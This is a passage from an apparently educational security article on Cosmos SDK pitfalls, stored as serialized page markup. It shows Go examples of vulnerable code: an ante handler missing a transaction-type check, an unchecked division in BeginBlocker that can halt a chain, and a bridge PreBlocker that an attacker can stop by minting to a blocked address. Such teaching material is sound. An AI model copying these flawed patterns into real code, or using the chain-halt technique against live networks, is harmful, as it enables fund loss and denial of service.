option\"",{"type":24,"tag":301,"props":87315,"children":87316},{"style":359},[87317],{"type":30,"value":1729},{"type":24,"tag":301,"props":87319,"children":87320},{"class":303,"line":4438},[87321],{"type":24,"tag":301,"props":87322,"children":87323},{"style":359},[87324],{"type":30,"value":87206},{"type":24,"tag":301,"props":87326,"children":87327},{"class":303,"line":4446},[87328],{"type":24,"tag":301,"props":87329,"children":87330},{"style":359},[87331],{"type":30,"value":4211},{"type":24,"tag":301,"props":87333,"children":87334},{"class":303,"line":4506},[87335],{"type":24,"tag":301,"props":87336,"children":87337},{"emptyLinePlaceholder":16},[87338],{"type":30,"value":341},{"type":24,"tag":301,"props":87340,"children":87341},{"class":303,"line":4566},[87342,87346,87350,87354,87358,87362,87366,87370,87374],{"type":24,"tag":301,"props":87343,"children":87344},{"style":308},[87345],{"type":30,"value":67441},{"type":24,"tag":301,"props":87347,"children":87348},{"style":314},[87349],{"type":30,"value":86835},{"type":24,"tag":301,"props":87351,"children":87352},{"style":359},[87353],{"type":30,"value":362},{"type":24,"tag":301,"props":87355,"children":87356},{"style":369},[87357],{"type":30,"value":27051},{"type":24,"tag":301,"props":87359,"children":87360},{"style":359},[87361],{"type":30,"value":377},{"type":24,"tag":301,"props":87363,"children":87364},{"style":369},[87365],{"type":30,"value":85893},{"type":24,"tag":301,"props":87367,"children":87368},{"style":359},[87369],{"type":30,"value":377},{"type":24,"tag":301,"props":87371,"children":87372},{"style":369},[87373],{"type":30,"value":86773},{"type":24,"tag":301,"props":87375,"children":87376},{"style":359},[87377],{"type":30,"value":791},{"type":24,"tag":301,"props":87379,"children":87380},{"class":303,"line":4574},[87381],{"type":24,"tag":301,"props":87382,"children":87383},{"style":359},[87384],{"type":30,"value":65600},{"type":24,"tag":301,"props":87386,"children":87387},{"class":303,"line":4590},[87388],{"type":24,"tag":301,"props":87389,"children":87390},{"style":359},[87391],{"type":30,"value":3345},{"type":24,"tag":301,"props":87393,"children":87394},{"class":303,"line":4599},[87395],{"type":24,"tag":301,"props":87396,"children":87397},{"emptyLinePlaceholder":16},[87398],{"type":30,"value":341},{"type":24,"tag":301,"props":87400,"children":87401},{"class":303,"line":4629},[87402],{"type":24,"tag":301,"props":87403,"children":87404},{"style":1062},[87405],{"type":30,"value":87406}," // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n",{"type":24,"tag":301,"props":87408,"children":87409},{"class":303,"line":4659},[87410],{"type":24,"tag":301,"props":87411,"children":87412},{"emptyLinePlaceholder":16},[87413],{"type":30,"value":341},{"type":24,"tag":301,"props":87415,"children":87416},{"class":303,"line":4668},[87417,87422,87426,87430,87434],{"type":24,"tag":301,"props":87418,"children":87419},{"style":308},[87420],{"type":30,"value":87421}," switch",{"type":24,"tag":301,"props":87423,"children":87424},{"style":369},[87425],{"type":30,"value":74740},{"type":24,"tag":301,"props":87427,"children":87428},{"style":359},[87429],{"type":30,"value":85492},{"type":24,"tag":301,"props":87431,"children":87432},{"style":348},[87433],{"type":30,"value":7026},{"type":24,"tag":301,"props":87435,"children":87436},{"style":359},[87437],{"type":30,"value":398},{"type":24,"tag":301,"props":87439,"children":87440},{"class":303,"line":4677},[87441,87446,87450,87454,87458],{"type":24,"tag":301,"props":87442,"children":87443},{"style":308},[87444],{"type":30,"value":87445}," case",{"type":24,"tag":301,"props":87447,"children":87448},{"style":10246},[87449],{"type":30,"value":85353},{"type":24,"tag":301,"props":87451,"children":87452},{"style":359},[87453],{"type":30,"value":206},{"type":24,"tag":301,"props":87455,"children":87456},{"style":10246},[87457],{"type":30,"value":85386},{"type":24,"tag":301,"props":87459,"children":87460},{"style":359},[87461],{"type":30,"value":12388},{"type":24,"tag":301,"props":87463,"children":87464},{"class":303,"line":4697},[87465,87470,87474,87478,87482,87486],{"type":24,"tag":301,"props":87466,"children":87467},{"style":369},[87468],{"type":30,"value":87469}," anteHandler",{"type":24,"tag":301,"props":87471,"children":87472},{"style":385},[87473],{"type":30,"value":2537},{"type":24,"tag":301,"props":87475,"children":87476},{"style":369},[87477],{"type":30,"value":85353},{"type":24,"tag":301,"props":87479,"children":87480},{"style":359},[87481],{"type":30,"value":206},{"type":24,"tag":301,"props":87483,"children":87484},{"style":314},[87485],{"type":30,"value":87144},{"type":24,"tag":301,"props":87487,"children":87488},{"style":359},[87489],{"type":30,"value":1707},{"type":24,"tag":301,"props":87491,"children":87492},{"class":303,"line":4725},[87493,87498,87502,87507,87511],{"type":24,"tag":301,"props":87494,"children":87495},{"style":369},[87496],{"type":30,"value":87497}," authante",{"type":24,"tag":301,"props":87499,"children":87500},{"style":359},[87501],{"type":30,"value":206},{"type":24,"tag":301,"props":87503,"children":87504},{"style":314},[87505],{"type":30,"value":87506},"NewSetUpContextDecorator",{"type":24,"tag":301,"props":87508,"children":87509},{"style":359},[87510],{"type":30,"value":25153},{"type":24,"tag":301,"props":87512,"children":87513},{"style":1062},[87514],{"type":30,"value":86007},{"type":24,"tag":301,"props":87516,"children":87517},{"class":303,"line":4733},[87518],{"type":24,"tag":301,"props":87519,"children":87520},{"style":385},[87521],{"type":30,"value":87522}," ...\n",{"type":24,"tag":301,"props":87524,"children":87525},{"class":303,"line":4741},[87526,87530,87534,87539,87543,87547,87551],{"type":24,"tag":301,"props":87527,"children":87528},{"style":369},[87529],{"type":30,"value":87497},{"type":24,"tag":301,"props":87531,"children":87532},{"style":359},[87533],{"type":30,"value":206},{"type":24,"tag":301,"props":87535,"children":87536},{"style":314},[87537],{"type":30,"value":87538},"NewIncrementSequenceDecorator",{"type":24,"tag":301,"props":87540,"children":87541},{"style":359},[87542],{"type":30,"value":362},{"type":24,"tag":301,"props":87544,"children":87545},{"style":369},[87546],{"type":30,"value":87189},{"type":24,"tag":301,"props":87548,"children":87549},{"style":359},[87550],{"type":30,"value":21967},{"type":24,"tag":301,"props":87552,"children":87553},{"style":1062},[87554],{"type":30,"value":87555},"// innermost AnteDecorator\n",{"type":24,"tag":301,"props":87557,"children":87558},{"class":303,"line":4757},[87559],{"type":24,"tag":301,"props":87560,"children":87561},{"style":359},[87562],{"type":30,"value":84227},{"type":24,"tag":301,"props":87564,"children":87565},{"class":303,"line":4765},[87566,87571],{"type":24,"tag":301,"props":87567,"children":87568},{"style":308},[87569],{"type":30,"value":87570}," default",{"type":24,"tag":301,"props":87572,"children":87573},{"style":359},[87574],{"type":30,"value":12388},{"type":24,"tag":301,"props":87576,"children":87577},{"class":303,"line":4773},[87578,87582,87586,87590,87594,87598,87602],{"type":24,"tag":301,"props":87579,"children":87580},{"style":308},[87581],{"type":30,"value":85788},{"type":24,"tag":301,"props":87583,"children":87584},{"style":369},[87585],{"type":30,"value":32599},{"type":24,"tag":301,"props":87587,"children":87588},{"style":359},[87589],{"type":30,"value":377},{"type":24,"tag":301,"props":87591,"children":87592},{"style":369},[87593],{"type":30,"value":87246},{"type":24,"tag":301,"props":87595,"children":87596},{"style":359},[87597],{"type":30,"value":206},{"type":24,"tag":301,"props":87599,"children":87600},{"style":314},[87601],{"type":30,"value":87255},{"type":24,"tag":301,"props":87603,"children":87604},{"style":359},[87605],{"type":30,"value":1707},{"type":24,"tag":301,"props":87607,"children":87608},{"class":303,"line":4781},[87609,87614,87618,87623,87627,87631,87635,87640,87644,87649,87653,87657],{"type":24,"tag":301,"props":87610,"children":87611},{"style":369},[87612],{"type":30,"value":87613}," sdkerrors",{"type":24,"tag":301,"props":87615,"children":87616},{"style":359},[87617],{"type":30,"value":206},{"type":24,"tag":301,"props":87619,"children":87620},{"style":314},[87621],{"type":30,"value":87622},"Wrapf",{"type":24,"tag":301,"props":87624,"children":87625},{"style":359},[87626],{"type":30,"value":362},{"type":24,"tag":301,"props":87628,"children":87629},{"style":369},[87630],{"type":30,"value":87284},{"type":24,"tag":301,"props":87632,"children":87633},{"style":359},[87634],{"type":30,"value":206},{"type":24,"tag":301,"props":87636,"children":87637},{"style":369},[87638],{"type":30,"value":87639},"ErrUnknownRequest",{"type":24,"tag":301,"props":87641,"children":87642},{"style":359},[87643],{"type":30,"value":377},{"type":24,"tag":301,"props":87645,"children":87646},{"style":329},[87647],{"type":30,"value":87648},"\"invalid transaction type: %T\"",{"type":24,"tag":301,"props":87650,"children":87651},{"style":359},[87652],{"type":30,"value":377},{"type":24,"tag":301,"props":87654,"children":87655},{"style":369},[87656],{"type":30,"value":85893},{"type":24,"tag":301,"props":87658,"children":87659},{"style":359},[87660],{"type":30,"value":4656},{"type":24,"tag":301,"props":87662,"children":87663},{"class":303,"line":4789},[87664,87669],{"type":24,"tag":301,"props":87665,"children":87666},{"style":329},[87667],{"type":30,"value":87668}," \"transaction is not an SDK tx\"",{"type":24,"tag":301,"props":87670,"children":87671},{"style":359},[87672],{"type":30,"value":1729},{"type":24,"tag":301,"props":87674,"children":87675},{"class":303,"line":4848},[87676],{"type":24,"tag":301,"props":87677,"children":87678},{"style":359},[87679],{"type":30,"value":84227},{"type":24,"tag":301,"props":87681,"children":87682},{"class":303,"line":4862},[87683],{"type":24,"tag":301,"props":87684,"children":87685},{"style":359},[87686],{"type":30,"value":3345},{"type":24,"tag":301,"props":87688,"children":87689},{"class":303,"line":4871},[87690],{"type":24,"tag":301,"props":87691,"children":87692},{"emptyLinePlaceholder":16},[87693],{"type":30,"value":341},{"type":24,"tag":301,"props":87695,"children":87696},{"class":303,"line":4879},[87697,87701,87705,87709,87713,87717,87721,87725,87729],{"type":24,"tag":301,"props":87698,"children":87699},{"style":308},[87700],{"type":30,"value":482},{"type":24,"tag":301,"props":87702,"children":87703},{"style":314},[87704],{"type":30,"value":86835},{"type":24,"tag":301,"props":87706,"children":87707},{"style":359},[87708],{"type":30,"value":362},{"type":24,"tag":301,"props":87710,"children":87711},{"style":369},[87712],{"type":30,"value":27051},{"type":24,"tag":301,"props":87714,"children":87715},{"style":359},[87716],{"type":30,"value":377},{"type":24,"tag":301,"props":87718,"children":87719},{"style":369},[87720],{"type":30,"value":85893},{"type":24,"tag":301,"props":87722,"children":87723},{"style":359},[87724],{"type":30,"value":377},{"type":24,"tag":301,"props":87726,"children":87727},{"style":369},[87728],{"type":30,"value":86773},{"type":24,"tag":301,"props":87730,"children":87731},{"style":359},[87732],{"type":30,"value":791},{"type":24,"tag":301,"props":87734,"children":87735},{"class":303,"line":4942},[87736],{"type":24,"tag":301,"props":87737,"children":87738},{"style":359},[87739],{"type":30,"value":501},{"type":24,"tag":301,"props":87741,"children":87742},{"class":303,"line":4955},[87743],{"type":24,"tag":301,"props":87744,"children":87745},{"style":359},[87746],{"type":30,"value":698},{"type":24,"tag":32,"props":87748,"children":87749},{},[87750,87752,87757,87759,87766,87767,87774],{"type":30,"value":87751},"Additional examples of incorrect ",{"type":24,"tag":145,"props":87753,"children":87755},{"className":87754},[],[87756],{"type":30,"value":85182},{"type":30,"value":87758}," usage include ",{"type":24,"tag":188,"props":87760,"children":87763},{"href":87761,"rel":87762},"https://jumpcrypto.com/writing/bypassing-ethermint-ante-handlers",[192],[87764],{"type":30,"value":87765},"yet more bypassable checks and loss of funds",{"type":30,"value":2378},{"type":24,"tag":188,"props":87768,"children":87771},{"href":87769,"rel":87770},"https://github.com/cosmos/ibc-go/issues/853",[192],[87772],{"type":30,"value":87773},"incorrect data passing between blockchains",{"type":30,"value":206},{"type":24,"tag":43,"props":87776,"children":87778},{"id":87777},"errors-panics-i-can-handle-it",[87779],{"type":30,"value":87780},"Errors? Panics? I can handle it",{"type":24,"tag":32,"props":87782,"children":87783},{},[87784],{"type":30,"value":87785},"Smart contract developers are used to not properly handling errors. This is acceptable since most underlying blockchains revert all state changes when execution fails.",{"type":24,"tag":32,"props":87787,"children":87788},{},[87789],{"type":30,"value":87790},"Cosmos is designed to provide a similar experience. Whenever some message handler returns an error, changes to the persistent state are dropped. Panics are handled similarly, where a recovery handler is wrapped around the message execution to convert panics into errors for a downstream process.",{"type":24,"tag":32,"props":87792,"children":87793},{},[87794,87796,87802,87804,87809],{"type":30,"value":87795},"This design is pretty neat and allows developers to write code in a rather lazy way. For instance, the following code works perfectly fine. If ",{"type":24,"tag":145,"props":87797,"children":87799},{"className":87798},[],[87800],{"type":30,"value":87801},"k.keeper.TotalReward()",{"type":30,"value":87803}," returns zero, the ",{"type":24,"tag":145,"props":87805,"children":87807},{"className":87806},[],[87808],{"type":30,"value":64663},{"type":30,"value":87810}," execution will simply rollback as if nothing has happened.",{"type":24,"tag":291,"props":87812,"children":87814},{"code":87813,"language":82877,"meta":7,"className":82878,"style":7},"func (k msgServer) AllocateReward(\n goCtx context.Context,\n msg *types.MsgAllocateReward)\n(*types.MsgAllocatRewardResponse, error) {\n\n RewardPerShare := k.keeper.Shares() / k.keeper.TotalReward()\n k.keeper.DistributeReward(RewardPerShare)\n\n return &types.MsgAllocateRewardResponse, nil\n}\n",[87815],{"type":24,"tag":145,"props":87816,"children":87817},{"__ignoreMap":7},[87818,87851,87874,87902,87938,87945,88014,88052,88059,88091],{"type":24,"tag":301,"props":87819,"children":87820},{"class":303,"line":304},[87821,87825,87829,87834,87838,87842,87847],{"type":24,"tag":301,"props":87822,"children":87823},{"style":348},[87824],{"type":30,"value":83013},{"type":24,"tag":301,"props":87826,"children":87827},{"style":359},[87828],{"type":30,"value":873},{"type":24,"tag":301,"props":87830,"children":87831},{"style":369},[87832],{"type":30,"value":87833},"k ",{"type":24,"tag":301,"props":87835,"children":87836},{"style":10246},[87837],{"type":30,"value":83027},{"type":24,"tag":301,"props":87839,"children":87840},{"style":359},[87841],{"type":30,"value":911},{"type":24,"tag":301,"props":87843,"children":87844},{"style":314},[87845],{"type":30,"value":87846},"AllocateReward",{"type":24,"tag":301,"props":87848,"children":87849},{"style":359},[87850],{"type":30,"value":1707},{"type":24,"tag":301,"props":87852,"children":87853},{"class":303,"line":320},[87854,87858,87862,87866,87870],{"type":24,"tag":301,"props":87855,"children":87856},{"style":369},[87857],{"type":30,"value":83048},{"type":24,"tag":301,"props":87859,"children":87860},{"style":10246},[87861],{"type":30,"value":83053},{"type":24,"tag":301,"props":87863,"children":87864},{"style":359},[87865],{"type":30,"value":206},{"type":24,"tag":301,"props":87867,"children":87868},{"style":10246},[87869],{"type":30,"value":83062},{"type":24,"tag":301,"props":87871,"children":87872},{"style":359},[87873],{"type":30,"value":1729},{"type":24,"tag":301,"props":87875,"children":87876},{"class":303,"line":335},[87877,87881,87885,87889,87893,87898],{"type":24,"tag":301,"props":87878,"children":87879},{"style":369},[87880],{"type":30,"value":83074},{"type":24,"tag":301,"props":87882,"children":87883},{"style":385},[87884],{"type":30,"value":431},{"type":24,"tag":301,"props":87886,"children":87887},{"style":10246},[87888],{"type":30,"value":12579},{"type":24,"tag":301,"props":87890,"children":87891},{"style":359},[87892],{"type":30,"value":206},{"type":24,"tag":301,"props":87894,"children":87895},{"style":10246},[87896],{"type":30,"value":87897},"MsgAllocateReward",{"type":24,"tag":301,"props":87899,"children":87900},{"style":359},[87901],{"type":30,"value":791},{"type":24,"tag":301,"props":87903,"children":87904},{"class":303,"line":344},[87905,87909,87913,87917,87921,87926,87930,87934],{"type":24,"tag":301,"props":87906,"children":87907},{"style":359},[87908],{"type":30,"value":362},{"type":24,"tag":301,"props":87910,"children":87911},{"style":385},[87912],{"type":30,"value":772},{"type":24,"tag":301,"props":87914,"children":87915},{"style":10246},[87916],{"type":30,"value":12579},{"type":24,"tag":301,"props":87918,"children":87919},{"style":359},[87920],{"type":30,"value":206},{"type":24,"tag":301,"props":87922,"children":87923},{"style":10246},[87924],{"type":30,"value":87925},"MsgAllocatRewardResponse",{"type":24,"tag":301,"props":87927,"children":87928},{"style":359},[87929],{"type":30,"value":377},{"type":24,"tag":301,"props":87931,"children":87932},{"style":10246},[87933],{"type":30,"value":21654},{"type":24,"tag":301,"props":87935,"children":87936},{"style":359},[87937],{"type":30,"value":398},{"type":24,"tag":301,"props":87939,"children":87940},{"class":303,"line":401},[87941],{"type":24,"tag":301,"props":87942,"children":87943},{"emptyLinePlaceholder":16},[87944],{"type":30,"value":341},{"type":24,"tag":301,"props":87946,"children":87947},{"class":303,"line":415},[87948,87953,87957,87962,87966,87971,87975,87980,87984,87988,87993,87997,88001,88005,88010],{"type":24,"tag":301,"props":87949,"children":87950},{"style":369},[87951],{"type":30,"value":87952}," RewardPerShare",{"type":24,"tag":301,"props":87954,"children":87955},{"style":385},[87956],{"type":30,"value":83129},{"type":24,"tag":301,"props":87958,"children":87959},{"style":369},[87960],{"type":30,"value":87961}," k",{"type":24,"tag":301,"props":87963,"children":87964},{"style":359},[87965],{"type":30,"value":206},{"type":24,"tag":301,"props":87967,"children":87968},{"style":369},[87969],{"type":30,"value":87970},"keeper",{"type":24,"tag":301,"props":87972,"children":87973},{"style":359},[87974],{"type":30,"value":206},{"type":24,"tag":301,"props":87976,"children":87977},{"style":314},[87978],{"type":30,"value":87979},"Shares",{"type":24,"tag":301,"props":87981,"children":87982},{"style":359},[87983],{"type":30,"value":20835},{"type":24,"tag":301,"props":87985,"children":87986},{"style":385},[87987],{"type":30,"value":1036},{"type":24,"tag":301,"props":87989,"children":87990},{"style":369},[87991],{"type":30,"value":87992}," k",{"type":24,"tag":301,"props":87994,"children":87995},{"style":359},[87996],{"type":30,"value":206},{"type":24,"tag":301,"props":87998,"children":87999},{"style":369},[88000],{"type":30,"value":87970},{"type":24,"tag":301,"props":88002,"children":88003},{"style":359},[88004],{"type":30,"value":206},{"type":24,"tag":301,"props":88006,"children":88007},{"style":314},[88008],{"type":30,"value":88009},"TotalReward",{"type":24,"tag":301,"props":88011,"children":88012},{"style":359},[88013],{"type":30,"value":14551},{"type":24,"tag":301,"props":88015,"children":88016},{"class":303,"line":439},[88017,88022,88026,88030,88034,88039,88043,88048],{"type":24,"tag":301,"props":88018,"children":88019},{"style":369},[88020],{"type":30,"value":88021}," k",{"type":24,"tag":301,"props":88023,"children":88024},{"style":359},[88025],{"type":30,"value":206},{"type":24,"tag":301,"props":88027,"children":88028},{"style":369},[88029],{"type":30,"value":87970},{"type":24,"tag":301,"props":88031,"children":88032},{"style":359},[88033],{"type":30,"value":206},{"type":24,"tag":301,"props":88035,"children":88036},{"style":314},[88037],{"type":30,"value":88038},"DistributeReward",{"type":24,"tag":301,"props":88040,"children":88041},{"style":359},[88042],{"type":30,"value":362},{"type":24,"tag":301,"props":88044,"children":88045},{"style":369},[88046],{"type":30,"value":88047},"RewardPerShare",{"type":24,"tag":301,"props":88049,"children":88050},{"style":359},[88051],{"type":30,"value":791},{"type":24,"tag":301,"props":88053,"children":88054},{"class":303,"line":447},[88055],{"type":24,"tag":301,"props":88056,"children":88057},{"emptyLinePlaceholder":16},[88058],{"type":30,"value":341},{"type":24,"tag":301,"props":88060,"children":88061},{"class":303,"line":476},[88062,88066,88070,88074,88078,88083,88087],{"type":24,"tag":301,"props":88063,"children":88064},{"style":308},[88065],{"type":30,"value":680},{"type":24,"tag":301,"props":88067,"children":88068},{"style":385},[88069],{"type":30,"value":991},{"type":24,"tag":301,"props":88071,"children":88072},{"style":369},[88073],{"type":30,"value":12579},{"type":24,"tag":301,"props":88075,"children":88076},{"style":359},[88077],{"type":30,"value":206},{"type":24,"tag":301,"props":88079,"children":88080},{"style":369},[88081],{"type":30,"value":88082},"MsgAllocateRewardResponse",{"type":24,"tag":301,"props":88084,"children":88085},{"style":359},[88086],{"type":30,"value":377},{"type":24,"tag":301,"props":88088,"children":88089},{"style":348},[88090],{"type":30,"value":83354},{"type":24,"tag":301,"props":88092,"children":88093},{"class":303,"line":495},[88094],{"type":24,"tag":301,"props":88095,"children":88096},{"style":359},[88097],{"type":30,"value":698},{"type":24,"tag":32,"props":88099,"children":88100},{},[88101,88103,88109,88110,88116,88117,88123,88125,88130],{"type":30,"value":88102},"However, the same assumption does not always hold. Certain parts of Cosmos, such as ",{"type":24,"tag":145,"props":88104,"children":88106},{"className":88105},[],[88107],{"type":30,"value":88108},"PreBlocker",{"type":30,"value":377},{"type":24,"tag":145,"props":88111,"children":88113},{"className":88112},[],[88114],{"type":30,"value":88115},"BeginBlocker",{"type":30,"value":8410},{"type":24,"tag":145,"props":88118,"children":88120},{"className":88119},[],[88121],{"type":30,"value":88122},"EndBlocker",{"type":30,"value":88124},", are not protected by the error handling mechanism. So, if we move the reward distribution logic into ",{"type":24,"tag":145,"props":88126,"children":88128},{"className":88127},[],[88129],{"type":30,"value":88115},{"type":30,"value":88131}," to automatically distribute rewards at the start of each block, panics raised by division by 0 will halt the chain.",{"type":24,"tag":291,"props":88133,"children":88135},{"code":88134,"language":82877,"meta":7,"className":82878,"style":7},"func BeginBlocker(ctx context.Context, keeper keeper.Keeper) error {\n\n RewardPerShare := keeper.Shares() / keeper.TotalReward()\n keeper.DistributeReward(RewardPerShare)\n\n return nil\n}\n",[88136],{"type":24,"tag":145,"props":88137,"children":88138},{"__ignoreMap":7},[88139,88204,88211,88259,88287,88294,88306],{"type":24,"tag":301,"props":88140,"children":88141},{"class":303,"line":304},[88142,88146,88151,88155,88159,88163,88167,88171,88175,88179,88184,88188,88192,88196,88200],{"type":24,"tag":301,"props":88143,"children":88144},{"style":348},[88145],{"type":30,"value":83013},{"type":24,"tag":301,"props":88147,"children":88148},{"style":314},[88149],{"type":30,"value":88150}," BeginBlocker",{"type":24,"tag":301,"props":88152,"children":88153},{"style":359},[88154],{"type":30,"value":362},{"type":24,"tag":301,"props":88156,"children":88157},{"style":369},[88158],{"type":30,"value":27051},{"type":24,"tag":301,"props":88160,"children":88161},{"style":10246},[88162],{"type":30,"value":83053},{"type":24,"tag":301,"props":88164,"children":88165},{"style":359},[88166],{"type":30,"value":206},{"type":24,"tag":301,"props":88168,"children":88169},{"style":10246},[88170],{"type":30,"value":83062},{"type":24,"tag":301,"props":88172,"children":88173},{"style":359},[88174],{"type":30,"value":377},{"type":24,"tag":301,"props":88176,"children":88177},{"style":369},[88178],{"type":30,"value":87970},{"type":24,"tag":301,"props":88180,"children":88181},{"style":10246},[88182],{"type":30,"value":88183}," keeper",{"type":24,"tag":301,"props":88185,"children":88186},{"style":359},[88187],{"type":30,"value":206},{"type":24,"tag":301,"props":88189,"children":88190},{"style":10246},[88191],{"type":30,"value":86657},{"type":24,"tag":301,"props":88193,"children":88194},{"style":359},[88195],{"type":30,"value":911},{"type":24,"tag":301,"props":88197,"children":88198},{"style":10246},[88199],{"type":30,"value":21654},{"type":24,"tag":301,"props":88201,"children":88202},{"style":359},[88203],{"type":30,"value":3035},{"type":24,"tag":301,"props":88205,"children":88206},{"class":303,"line":320},[88207],{"type":24,"tag":301,"props":88208,"children":88209},{"emptyLinePlaceholder":16},[88210],{"type":30,"value":341},{"type":24,"tag":301,"props":88212,"children":88213},{"class":303,"line":335},[88214,88218,88222,88226,88230,88234,88238,88242,88247,88251,88255],{"type":24,"tag":301,"props":88215,"children":88216},{"style":369},[88217],{"type":30,"value":87952},{"type":24,"tag":301,"props":88219,"children":88220},{"style":385},[88221],{"type":30,"value":83129},{"type":24,"tag":301,"props":88223,"children":88224},{"style":369},[88225],{"type":30,"value":88183},{"type":24,"tag":301,"props":88227,"children":88228},{"style":359},[88229],{"type":30,"value":206},{"type":24,"tag":301,"props":88231,"children":88232},{"style":314},[88233],{"type":30,"value":87979},{"type":24,"tag":301,"props":88235,"children":88236},{"style":359},[88237],{"type":30,"value":20835},{"type":24,"tag":301,"props":88239,"children":88240},{"style":385},[88241],{"type":30,"value":1036},{"type":24,"tag":301,"props":88243,"children":88244},{"style":369},[88245],{"type":30,"value":88246}," keeper",{"type":24,"tag":301,"props":88248,"children":88249},{"style":359},[88250],{"type":30,"value":206},{"type":24,"tag":301,"props":88252,"children":88253},{"style":314},[88254],{"type":30,"value":88009},{"type":24,"tag":301,"props":88256,"children":88257},{"style":359},[88258],{"type":30,"value":14551},{"type":24,"tag":301,"props":88260,"children":88261},{"class":303,"line":344},[88262,88267,88271,88275,88279,88283],{"type":24,"tag":301,"props":88263,"children":88264},{"style":369},[88265],{"type":30,"value":88266}," keeper",{"type":24,"tag":301,"props":88268,"children":88269},{"style":359},[88270],{"type":30,"value":206},{"type":24,"tag":301,"props":88272,"children":88273},{"style":314},[88274],{"type":30,"value":88038},{"type":24,"tag":301,"props":88276,"children":88277},{"style":359},[88278],{"type":30,"value":362},{"type":24,"tag":301,"props":88280,"children":88281},{"style":369},[88282],{"type":30,"value":88047},{"type":24,"tag":301,"props":88284,"children":88285},{"style":359},[88286],{"type":30,"value":791},{"type":24,"tag":301,"props":88288,"children":88289},{"class":303,"line":401},[88290],{"type":24,"tag":301,"props":88291,"children":88292},{"emptyLinePlaceholder":16},[88293],{"type":30,"value":341},{"type":24,"tag":301,"props":88295,"children":88296},{"class":303,"line":415},[88297,88301],{"type":24,"tag":301,"props":88298,"children":88299},{"style":308},[88300],{"type":30,"value":59590},{"type":24,"tag":301,"props":88302,"children":88303},{"style":348},[88304],{"type":30,"value":88305}," nil\n",{"type":24,"tag":301,"props":88307,"children":88308},{"class":303,"line":439},[88309],{"type":24,"tag":301,"props":88310,"children":88311},{"style":359},[88312],{"type":30,"value":698},{"type":24,"tag":80,"props":88314,"children":88316},{"id":88315},"real-world-examples-3",[88317],{"type":30,"value":83401},{"type":24,"tag":32,"props":88319,"children":88320},{},[88321],{"type":30,"value":88322},"Recently, developers have become increasingly aware of unprotected ABCI functions, but this doesn't stop DoS bugs from manifesting. So what is the catch?",{"type":24,"tag":32,"props":88324,"children":88325},{},[88326,88328,88334,88336,88341,88343,88349,88351,88357,88359,88365],{"type":30,"value":88327},"The problem lies in the lack of proper understanding of utility functions. The example here implements a bridge that mints wrapped BTC tokens in the PreBlocker when bridging events are observed. Notably, errors returned by ",{"type":24,"tag":145,"props":88329,"children":88331},{"className":88330},[],[88332],{"type":30,"value":88333},"bankKeeper.SendCoinsFromModuleToAccount",{"type":30,"value":88335}," will be bubbled up through ",{"type":24,"tag":145,"props":88337,"children":88339},{"className":88338},[],[88340],{"type":30,"value":88108},{"type":30,"value":88342}," and halt the chain. It turns out an attacker can force ",{"type":24,"tag":145,"props":88344,"children":88346},{"className":88345},[],[88347],{"type":30,"value":88348},"SendCoinsFromModuleToAccount",{"type":30,"value":88350}," to return an error by setting ",{"type":24,"tag":145,"props":88352,"children":88354},{"className":88353},[],[88355],{"type":30,"value":88356},"recipient",{"type":30,"value":88358}," to some ",{"type":24,"tag":145,"props":88360,"children":88362},{"className":88361},[],[88363],{"type":30,"value":88364},"BlockedAddr",{"type":30,"value":88366},",rendering the code susceptible to DoS attacks.",{"type":24,"tag":32,"props":88368,"children":88369},{},[88370],{"type":24,"tag":188,"props":88371,"children":88374},{"href":88372,"rel":88373},"https://github.com/mezo-org/mezod/blob/d3b1a049a9acce977fdadd245cb381252f101922/x/bridge/keeper/assets_locked.go#L170",[192],[88375],{"type":30,"value":83451},{"type":24,"tag":291,"props":88377,"children":88379},{"code":88378,"language":82877,"meta":7,"className":82878,"style":7},"func (pbh *PreBlockHandler) PreBlocker() sdk.PreBlocker {\n return func(\n ctx sdk.Context,\n req *cmtabci.RequestFinalizeBlock,\n ) (*sdk.ResponsePreBlock, error) {\n ...\n err := pbh.bridgeKeeper.AcceptAssetsLocked(ctx, events)\n if err != nil {\n return nil, fmt.Errorf(\"cannot accept AssetsLocked events: %w\", err)\n }\n ...\n }\n}\n\nfunc (k Keeper) AcceptAssetsLocked(\n ctx sdk.Context,\n events types.AssetsLockedEvents,\n) error {\n ...\n for _, event := range events {\n recipient, err := sdk.AccAddressFromBech32(event.Recipient)\n if err != nil {\n return fmt.Errorf(\"failed to parse recipient address: %w\", err)\n }\n\n if bytes.Equal(event.TokenBytes(), sourceBTCToken) {\n err = k.mintBTC(ctx, recipient, event.Amount)\n if err != nil {\n return fmt.Errorf(\n \"failed to mint BTC for event %v: %w\",\n event.Sequence,\n err,\n )\n }\n } else {\n ...\n }\n }\n ...\n}\n\nfunc (k Keeper) mintBTC(\n ctx sdk.Context,\n recipient sdk.AccAddress,\n amount math.Int,\n) error {\n ...\n err = k.bankKeeper.SendCoinsFromModuleToAccount(\n ctx,\n types.ModuleName,\n recipient,\n coins,\n )\n if err != nil {\n return fmt.Errorf(\"failed to send coins: %w\", err)\n }\n ...\n}\n",[88380],{"type":24,"tag":145,"props":88381,"children":88382},{"__ignoreMap":7},[88383,88436,88451,88474,88504,88540,88548,88604,88628,88678,88685,88692,88699,88706,88713,88744,88767,88792,88807,88814,88851,88905,88928,88969,88976,88983,89034,89095,89118,89141,89153,89174,89186,89194,89201,89216,89224,89231,89238,89245,89252,89259,89290,89313,89338,89363,89378,89385,89422,89433,89454,89465,89477,89484,89507,89547,89554,89561],{"type":24,"tag":301,"props":88384,"children":88385},{"class":303,"line":304},[88386,88390,88394,88399,88403,88408,88412,88416,88420,88424,88428,88432],{"type":24,"tag":301,"props":88387,"children":88388},{"style":348},[88389],{"type":30,"value":83013},{"type":24,"tag":301,"props":88391,"children":88392},{"style":359},[88393],{"type":30,"value":873},{"type":24,"tag":301,"props":88395,"children":88396},{"style":369},[88397],{"type":30,"value":88398},"pbh 